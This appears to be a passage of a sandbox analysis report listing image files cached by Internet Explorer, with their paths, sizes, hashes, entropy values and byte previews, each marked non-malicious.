                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..z.J.3@.....@.@....@.(.h`6..P........(.q@..&h.s@.(.E.;4..0...\....J......J.r.... .@...C....L..@...J..J.....@.y.....Z@4............(...@.4....b...(..@.=)......&h....@.4.P....@&h.A.....`.(.....P.@.....J.Q@.@.J.i.@..:..@.@.....<P.P..I...S@.F;..@......^.........<.@5....P.(.A@.<P..@....1@.@...........C@...\....Z.(.............o4.$q.....8.u4.....+.. ..d;~.......h..t.N>.b&..E.].~..d.....m
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQWN27[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20084
                                                                                                                                                                                                                              Entropy (8bit):7.952135561729653
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NkutMulvimxLMdBGbDRbtuDg2Kqz99Jo62163cXjdyPjjydXA+LYOj9brbd+jyXw:NkutMy6mxLeUNtuMABf/CgczGfyxA+LW
                                                                                                                                                                                                                              MD5:0F85A59AFD921E06E739234EBBFCFF7F
                                                                                                                                                                                                                              SHA1:0A081F5CDA7224A219E97E6668FE5C079F473F3D
                                                                                                                                                                                                                              SHA-256:86F91238B0C5BA5D297E3C58835DA37D58A00FA218D75FC1FB9B482CD75A2CE8
                                                                                                                                                                                                                              SHA-512:E8E1C93F9114DFF133A8CCA08D8FA10870E7550193377C4A069EBF625B4803FBA6121563B5470FDA5498BF3E96ECD52C02354D2B1002CD0F3D115261EA1ABF7B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..W...V..,~.y.Wh..B*..#l.&N.z..G9..Km.m(......K..f..@j..2.&.b..4...h.0h...././jk....v..G...7......e.kBO.3.S....d|..R1.q@.4..@..3`.89...[...a.k".M.,.j.M.H...\.W)Dd..9S.hLM.....)...%fF.#4.....'h............L.14.....H...q..q.Y..&...Z..^G..9<S...+.._7#...NBE5..H\`.T.B..XP...{.\j.."....B(........[.t...].e..R1J.@.....@.@?z.Z...d'.B(9.@....`......6MWAu)H..vg5.d0&.0p...V$.H.p......d.a
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQWZ1M[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11524
                                                                                                                                                                                                                              Entropy (8bit):7.853199656109683
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:Q255QcmmWT3NeMr8Su3KTBwYP5HTHnSyRzaHbxzdFlyUi2JmJwRd2bxUdgRhCyq:N55QWWxFoXPYFH3ROBpyUiAuYdixUgR+
                                                                                                                                                                                                                              MD5:184A58668CF5B11BACAA18CA15D4B08D
                                                                                                                                                                                                                              SHA1:F5F9515D2792A83933D3A781A0282791005D3A90
                                                                                                                                                                                                                              SHA-256:5C71A4888CFD8F6E5A2422852B21D7E3BBEEDDEF6656C9B7FCFBAA7DAE35C3BF
                                                                                                                                                                                                                              SHA-512:33CC28FA94C100216D061D01E4379AD5E60C05CA99E3E4A9AC4788831E96A4EBC84792D1096180A4C9C60A54E5514E801F6796FF63441B239930E9C5D3834CEE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....a.$}._.......5>......L...(...4.P.@....P.@....P.@......."....Qq.M...y..`..b.....f....a.u.....n..0Xi.Z9.a...Q...nOj...M.Qp.^.w.<.....T.a.3......L.O$.......4...jw..Op.g.....4.....y...T.ba!4..BE1..}(..o. ....p....;.._.{Qp..n}..X>..K.,.i...V...S.c...4...>..K.9C.^.....I.G0r.D...a.q.FlZv...5...+..t5.,....;.2.. ..C.h.7.S@....w..!j.7P....>..M....4....@..yk.a@.W.......E..E......`...
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQWeGa[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12503
                                                                                                                                                                                                                              Entropy (8bit):7.861125255017763
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NOxz4RTFHGSd1PGyjC1qJvd/ernz9Bc+ACiUhb:NIz6TFmEGyEqvozJz
                                                                                                                                                                                                                              MD5:593272E4883F05B819B99C6A4E27E320
                                                                                                                                                                                                                              SHA1:7C0EAA8D680B0BD013F4215A9AED0BBBAB732ED7
                                                                                                                                                                                                                              SHA-256:EEF26258D6D8B72752EC7D53B19DB2078F133898614EFFD4496620582E5A507D
                                                                                                                                                                                                                              SHA-512:37AAEA107ABDEF120CD2C6230B7EA207A3FD7EC109006EDC8ACA0B5580E062E67DA22EC8B5F413F319B743BF1A967AA66FD5A76E3D9E077CE407B052D5D8EE7C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....R1. #..0..I..R.......LA@.m....'e.zPH..?.....c..4...#&.g.i..a.(.E.|......@.)..Z.<{...h...X..J,.I....`........=(...1.@......u."....s.0$NV....&4#...P.8...3T@).,A.)..gz.S@....=.6.j.,...#4.F......(....(.-!...2i...`....S..@7..S.>....Z.....2..b........#...4.@.$9.......(......#4.U...M..9.L.y4.4...c..i.%.9..7?.....\s.. .....Z....D.cOZ.(.4.P......K'.......29H..c..N...@.......0
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQXgGS[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7672
                                                                                                                                                                                                                              Entropy (8bit):7.899724287113537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:QoHqdeF0SalNmFwy9VM0IbyMp7GTFbXcF3zH:bHdF0SeNny9KWM1G5bgDH
                                                                                                                                                                                                                              MD5:BBB780E441A64C9C3E02355A7E40B10F
                                                                                                                                                                                                                              SHA1:994374DF769B6C987EED7D8A66CE2871F29B064E
                                                                                                                                                                                                                              SHA-256:869D76A392E2C5496B20C1B256CFC23E26FC0F6B58B0025BC98ABD86DF29040F
                                                                                                                                                                                                                              SHA-512:ED2CE8A2A2BE163EBDA4A745901AB8F695DB0391FA4DE1FA7710914BAE676DFAB66D710863B5D14507927FCA720B6787F6315F199ADD122BFFA77C0E01336D92
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.../)9.Y.P.$.`,x-....M.,......,F".Vi~y9.....@.4..3...(........`.%..K(i9......;.,j....I......L(?^I.r.ZE.o.Z3..0.YT.R)k.z..4.[.C..........^J.U...QT..n.L.V...-...Q&L...&............k.-........h..O.Cw.m.. ......7.. _..hH....=.i.t...P[..`9c.v.S.~..Xc..fG!@.l..l.:...j..K........}..Jqw%............x,...z._..AhZ.o#.O)...p.?............1 ..*...H2.T.t'.....K.....E..S9TdRW.F.e;.e.)T..
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAQXqYx[1].jpg
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):33189
                                                                                                                                                                                                                              Entropy (8bit):7.9490548374961
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:IBeUnZEbQqvWzovQqABKM2KC0ODo7QZjZs9QsHPH6q3gmDNyzqBHj:IBTnWbbOzovQXKZKBOD6RPGm5
                                                                                                                                                                                                                              MD5:24B9CB95258C67508D049AD4C96763A7
                                                                                                                                                                                                                              SHA1:1545F2FDEF85CECF7C4415A167D8EE0343B770D3
                                                                                                                                                                                                                              SHA-256:49C4D4C97D5F9B910C5E60B7532B3C1C7F867D3AE39C2A2C9C99ABA85CF5C34B
                                                                                                                                                                                                                              SHA-512:3071ECFEDB1E35D49AAD1174C3B13DC1EBB4DBFD38EB1B3165624A47F9ABC850976D2BF5F71631F0C44F2108DCE5FEA99D210CBAFAA6677F9C4A1C2CA885D66A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: ......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......@.b<S.-........R....R.!:8.*.,.&.....66D.Z...k.A......*..=2.b.U........3..(@y.j.Wz..H...`u.....F.m......26.......a2:..-".N_\+u*....0...R..<..oZHsf.z.7....+.../.@;...`/...p@'..)..q.D7..r>......|.....a.%.{.}.S.r.AK+P.{......)..B.:t.h.n.O5.D\Y.....F...).y..z..Cs.*..T...d.1.@u~...(.Cb..>..FA.}+.6.0{.w....6....5...ko,.:....w4H..~\7..F...C[..6K.5.fm.c.<..#.......K0....5.4
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\AAycUpK[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                              Entropy (8bit):6.585816958592039
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahm1TutaSP91hccpL3fHL5FlzNua5GVp:6v/7XSxFQcZ3f9rUa07
                                                                                                                                                                                                                              MD5:D63AE2349294868B3EC2658627995955
                                                                                                                                                                                                                              SHA1:E96A4ECB7E48AAC4355BDC28F12DA4C334AD2E20
                                                                                                                                                                                                                              SHA-256:12D743416FD1041E0D34C45732DD577A39CD218B65E3F39BF43F2277EE7E6553
                                                                                                                                                                                                                              SHA-512:4885F0BA41A6B9E0B14F588B6451C83B08ED2094247EE2160EAD9FB79D9A6474B7EF4DFFCA468845BD9DB27A66231833A9F94E62961975C55B12F3ACB9399C1A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx.c....?......`...k.?3.]..W..w..g..b.z.(..^...d...BQ..8.....?..(..lo.....E.........|.,. .\....gb.=..Ze0..A.....s...`M....ZW|.`@1..J..x.(.:...|....y...XH,..*....&-.a...8.B.8..A......S.Mn.....d30Y.Uw....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1aXBV1[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1161
                                                                                                                                                                                                                              Entropy (8bit):7.80841974432226
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:zxxmempCXfPZq+DLeP1cRwZFIjvh3wuiFZMrFYzWkG4iD3w:zxRBXfB9k1cRuFIbJWsFYT/2w
                                                                                                                                                                                                                              MD5:D858BE67BEA11BF5CEC1B2A6C1C1F395
                                                                                                                                                                                                                              SHA1:6090B195BEF6AF1157654048EECEA81E2DCEC42A
                                                                                                                                                                                                                              SHA-256:FC7CF2E8592C8E63CFF72530DA560E3293EC2DE3732823DBAEB4464609EA0494
                                                                                                                                                                                                                              SHA-512:180FA05957A2FCF8192006D5F8E8D3E4DE1D79DD6F9F100D254C513068FC291B3086DE9A8897B3658D83FE3335FDEB4023F13AC3A6A8A507729AE22B621EC7D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................U....pHYs..........+.....;IDATx...}..c.....j...2..Y.l....i.<4.c...)..p...M..(4b.Z.r...."cDe..Bz..sw.g.9.....^..u}?....n[he.{..,u.....`.>.[.iE...[.1B.Tx..X.7......0.[.....5.)p...x...d\...g..........WmE1.sl......u....3K.[......;...........f....W(.E3//6...2tG..AU...`7f.m. r;..r..{.~.X./.Q._..`.C...D.M.n.p%..U...0...HTe..1......7.@.Tn.r......C.k.../[..j.X..:.+Q.3.y.4. ,E....g.Y...p^..c..:..#/...iES....E.w..op.... .9.W........).+.1....A~.\...{...q.El..`.&;...o.&q:.K....|.....e.(..."9.z\.~.....G.h...\.'.;... G........J....P.gy..<BeK.I..<..d..MF".O.uE...R..-...{..J...F..*.a..lj...t\.W.....&.l|?...WvP...._o.c.....8..10;.q-"8L.2..~,....~V..|]..c..\.'...I.....u8.......Q.3..lB."..!LD.bs.K[..)0P0.9..'....K...W..g..,f.........S......S..)N..D;.....<.....7#..X2.ws.....H.vF'...,$l..R4.O/.~..j.'&..6.........!.D.m..].G........W#.Uir..sT..m....h...UN.._V#..S.6.....i..M....[..?.J.....OL\..Q<{.G.n5).Ix.....<+7Ey.....W.].NR.o...._.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1cEP3G[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1088
                                                                                                                                                                                                                              Entropy (8bit):7.81915680849984
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                                                                                                                                                                                                              MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                                                                                                                                                                                                              SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                                                                                                                                                                                                              SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                                                                                                                                                                                                              SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;*J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x*..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1cG73h[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1131
                                                                                                                                                                                                                              Entropy (8bit):7.767634475904567
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                                                                                                                                                                                              MD5:D1495662336B0F1575134D32AF5D670A
                                                                                                                                                                                                                              SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                                                                                                                                                                                              SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                                                                                                                                                                                              SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................U....pHYs..........+......IDATx..U=l.E.~3;w{..#].Dg!.SD...p...E....PEJ.......B4.RE. :h..B.0.-$.D"Q 8.(.;.r.{3...d...G......7o..9....vQ.+...Q......."!#I......x|...\...& .T6..~......Mr.d.....K..&..}.m.c.....`.`....AAA..,.F.?.v..Zk;...G...r7!..z......^K...z.........y...._..E..S....!$...0...u.-.Yp...@;;;%BQa.j..A.<)..k..N.....9.?..]t.Y.`....o....[.~~..u.sX.L..tN..m1...u...........Ic....,7..(..&...t.Ka.]..,.T..g.."...W......q....:+t.?6....A..}...3h.BM/.....*..<.~..A.`m...:.....H...7.....{.....$... AL..^-...?5FA7'q..8jue...*.....?A...v..0...aS.*:.0.%.%"......[.=a......X..j..<725.C..@.\. ..`.._....'...=....+.Sz.{......JK.A...C|{.|r.$.=Y.#5.K6.!........d.G...{......$.-D*.z..{...@.!d.e...&..o...$Y...v.1.....w..(U...iyWg.$...\>..].N...L.n=.[.....QeVe..&h...`;=.w.e9..}a=.......(.A&..#.jM~4.1.sH.%...h...Z2".........RP....&.3................a..&.I...y.m...XJK..'...a......!.d.......Tf.yLo8.+.+...KcZ.....|K..T....vd....cH.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB1kc8s[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):893
                                                                                                                                                                                                                              Entropy (8bit):7.702979580339968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5yrGVrpvzYKWJzgT7w2CGZi1/BwIBCHL/P:srG1pLYPJzY7w/G4OIKLH
                                                                                                                                                                                                                              MD5:CD8DFD7D16B4BA3E2873EE06DB780B06
                                                                                                                                                                                                                              SHA1:E8A79F0671D287E116C76FAA5F0E8A4099E0BD23
                                                                                                                                                                                                                              SHA-256:88E6642487D0F944C6A020133CAE030781CFDCB518802419F10AD78937BDA6DF
                                                                                                                                                                                                                              SHA-512:199AA29EF33317A43D1C6DF434DD5F9D0FF54BF363CCB1948A970C7EC6889B083565E85E0A140FCDFC38B675CA3EB24DEA0659897EF0450CEF43444E1CEFDA8B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR.............;0......pHYs..........+...../IDATx..]H.Q......LG.LW..Ha..:?.f_l...l.a..........z.a.e.=)....D...'c.E_...F.&).\...4....x...:...=..g.?.....>...'......b......I=.*.Z...V.o.....O........i4............9qjpWWW.P(|.T*M....}@0 ......Es .x...}.n..J.?....C(...V.UY[[.`........R.v..wvv........g.....v...H.....x......4.0..b.\v:.v\kN^'.`.....gb..y....FX,.y.J..............~.s..x<?.+...l6qYY..hT...A^^.....#.H....q}.^..r.o....WWW?....S.)...D..)..Qz.`0..f..T.t.VVV`ss.0:PQQ.MMM....p8...........`......H*..#'=......o.H$.......L&.,?..x.....(%.....c}.0DPPP@.3........t....=Xb.r.`aa......dr.E..u....6,.j-c;11......p8..(.LJ.d2..n..BaL...(..6.-...e..Z?.<...M...5hmm...|*..................`4.qjj....d$..CsQtLUUU.%.....N....Wn~~.:...=.........(===..$Z.......h4....$.c.q.LM...xgffl...r.O.........}....(.Y.{{{.+.2.M..8.P..89"g6...B.l..Z.....o.....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BB7gRE[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):501
                                                                                                                                                                                                                              Entropy (8bit):7.3374462687222906
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                                                                                                                                                                                              MD5:1FCA95AEED29D3219D0A53A78A041312
                                                                                                                                                                                                                              SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                                                                                                                                                                                              SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                                                                                                                                                                                              SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx..RKN.A.}... ...e1(."le.....F\...@.."...|... ..ld.$.(.`..V.0].ghK....]SS...J.I.<@.O.{..........:WB8~....}Hr...P.....`l.N...N.....Z...'.3..;....3.B-....i...L........b..{... ..Q.... ........L...=.d....n.....&.!..O....W1..."....gm5x....[.C.9^Q.BC.....O...../.(...|.~.0hv..S..7.....YBn..B..o.T<.........|.g&....U.....gm.. .....U..,.u..)\$.lN.w]Rm.......OZ.h.......zn.~...A.uy........,..........3(..........z<....IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBJBnUn[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):288
                                                                                                                                                                                                                              Entropy (8bit):6.883940047874842
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:6v/lhPahmrkNuv8Xwq370je5T6ORszPbNCAx3/aEzXWw1jXjp:6v/7AuAnWepDRAPbQbY19
                                                                                                                                                                                                                              MD5:86A74BC81B7844BF0A8B8586BD73F627
                                                                                                                                                                                                                              SHA1:E4B3D38AE8F307C04A70DF41EA2808E83BD45693
                                                                                                                                                                                                                              SHA-256:CD3FA7C44EFCC76E00BC8E64C6E3C1611D687CE868902009C02FC9E6E3E5800B
                                                                                                                                                                                                                              SHA-512:DB476A14E9EB449EBF7DDC5C24A639A997BA5FF99226CE983CF68C9B6B624ACE714CC17F9A808708E62C9C4FE080B38EF42F129C565D5B705D3E15C351BEE73D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview: .PNG........IHDR................a....pHYs..........+......IDATx.....a....'6)E...xb....o...%.`.B.d...IFIGw.}...&o}z..y.{.{5.p..(...D..&....a\a..(Fh`...(.... ..n....i..A...5j.jy7?2.p..!X(b.6.S.r.....~<.V...lip.\]g......._.W0X.....t............b....g.o......v;:P.......IEND.B`.
                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\BBPfCZL[1].png
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2313
                                                                                                                                                                                                                              Entropy (8bit):7.594679301225926
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5Zvh21Zt5SkY33fS+PuSsgSrrVi7X3ZgMjkCqBn9VKg3dPnRd:vkrrS333q+PagKk7X3ZgaI9kMpRd
                                                                                                                                                                                                                              MD5:59DAB7927838DE6A39856EED1495701B
                                                                                                                                                                                                                              SHA1:A80734C857BFF8FF159C1879A041C6EA2329A1FA
                                                                                                                                                                                                                              SHA-256:544BA9B5585B12B62B01C095633EFC953A7732A29CB1E941FDE5AD62AD462D57
                                                                                                                                                                                                                              SHA-512:7D3FB1A5CC782E3C5047A6C5F14BF26DD39B8974962550193464B84A9B83B4C42FB38B19BD0CEF8247B78E3674F0C26F499DAFCF9AF780710221259D2625DB86
                                                                                                                                                                                                                              Malicious:false
